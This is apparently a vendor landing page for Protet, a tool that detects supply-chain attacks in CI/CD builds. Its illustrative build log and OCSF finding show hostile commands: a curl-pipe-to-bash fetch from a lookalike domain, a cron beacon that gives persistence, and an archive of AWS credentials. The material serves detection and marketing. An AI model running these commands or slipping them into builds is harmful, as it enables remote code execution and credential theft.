Supply-chain attack detection
Catch what your dependency scanner can't see.
Protet watches what your build actually executes — not just what's declared in a manifest — and flags supply-chain attacks in real time, on your infrastructure or ours.
The gap
Your build environment holds more privilege than production — and gets watched far less.
CI/CD runners routinely carry registry credentials, cloud IAM roles, and signing keys — real, usable privilege, often broader than what the production workloads they build ever get. Most security tooling stops at what's declared: a lockfile, an SBOM, a lint rule. None of that sees a hijacked runner, a dependency-confusion payload, or a postinstall script that only turns malicious once the build actually runs it. Supply-chain attacks are the headline case — the deeper problem is a class of infrastructure that's privileged, ephemeral, and almost entirely unmonitored.
1
Telemetry
eBPF via Tetragon on Kubernetes out of the box — or bring your own collector from legacy runners. Collection is decoupled from detection, so it works wherever your builds already run.
2
Classification
A model trained specifically on real execve command sequences — not a general-purpose model prompted to guess.
3
Explanation
Pinpoints the exact command or chain that drove a verdict, so an analyst sees the reasoning, not just a score.
4
Integration
Every verdict ships as an OCSF Detection Finding — an open, vendor-neutral schema — over a plain webhook or log file. No new console to babysit: it's built to flow straight into the SIEM you already run.
See it in action
One verdict, two views.
An illustrative example of a flagged build session — the plain-language read an analyst sees, and the OCSF finding that reaches your SIEM at the same moment.
ci-build-7f3a · build-runners
malicious · 0.94Build log — execve sequence
npm install
node-gyp rebuild
1curl -s https://cdn-assets-optimize.io/postinstall.sh | bash
webpack --mode production
npm run build
2echo '*/5 * * * * curl -s .../beacon | bash' >> /etc/cron.d/npm-cache
npm test
3tar -czf /tmp/.cache -C /root/.aws .
rm -rf /tmp/.cache
Command attribution
No scores or magnitudes in this finding — hit1 is the always-computed top command, the attack chain is available on deeper-explainability tiers.
Delivered as OCSF — webhook or log file
{
"class_uid": 2004,
"class_name": "Detection Finding",
"category_uid": 2,
"metadata": { "version": "1.1.0", "product": { "name": "protet" } },
"finding_info": {
"uid": "b7e1c2-window-4-explanation",
"title": "Execve attribution for flagged window",
"desc": "Primary suspicious command and, on entitled plans, its most likely attack chain. Pod: ci-build-7f3a (build-runners)."
},
"container": { "pod_name": "ci-build-7f3a", "name": "" },
"cloud": { "region": "build-runners" },
"enrichments": [
{ "name": "finding_kind", "value": "explanation" },
{ "name": "window_id", "value": "b7e1c2-window-4" },
{ "name": "hit1_command", "value": "curl -s https://cdn-assets-optimize.io/postinstall.sh | bash" },
{ "name": "chain_length", "value": "3" },
{ "name": "chain_command_1", "value": "curl -s https://cdn-assets-optimize.io/postinstall.sh | bash" },
{ "name": "chain_command_2", "value": "echo '*/5 * * * * curl -s .../beacon | bash' >> /etc/cron.d/npm-cache" },
{ "name": "chain_command_3", "value": "tar -czf /tmp/.cache -C /root/.aws ." },
{ "name": "flippable", "value": "false" }
]
}
Illustrative example — command sequence condensed for readability. No scores or deltas are exposed in this finding by design. Full schema reference →
Deployment
Runs where your data has to stay.
Signed, offline model bundles — verified, license-gated, deployable fully air-gapped. Nothing leaves your network unless you decide it should.
Rigor
A model doesn't ship because it trained.
Hard promotion gates
Every challenger is evaluated against a held-out benchmark before it can replace the current model — improving offline metrics alone is not enough to ship.
Explainable by design
Verdicts come with the specific commands that drove them — a clear explanation, not a black-box score.
Continuous retraining
Detection keeps improving as new build sessions are observed — every promotion is gated, so improvement never comes at the cost of a quiet regression.
Pricing
Start free. Scale on-prem when you're ready.
Every tier runs on the same detection engine. What changes is explainability depth, monthly volume, and support.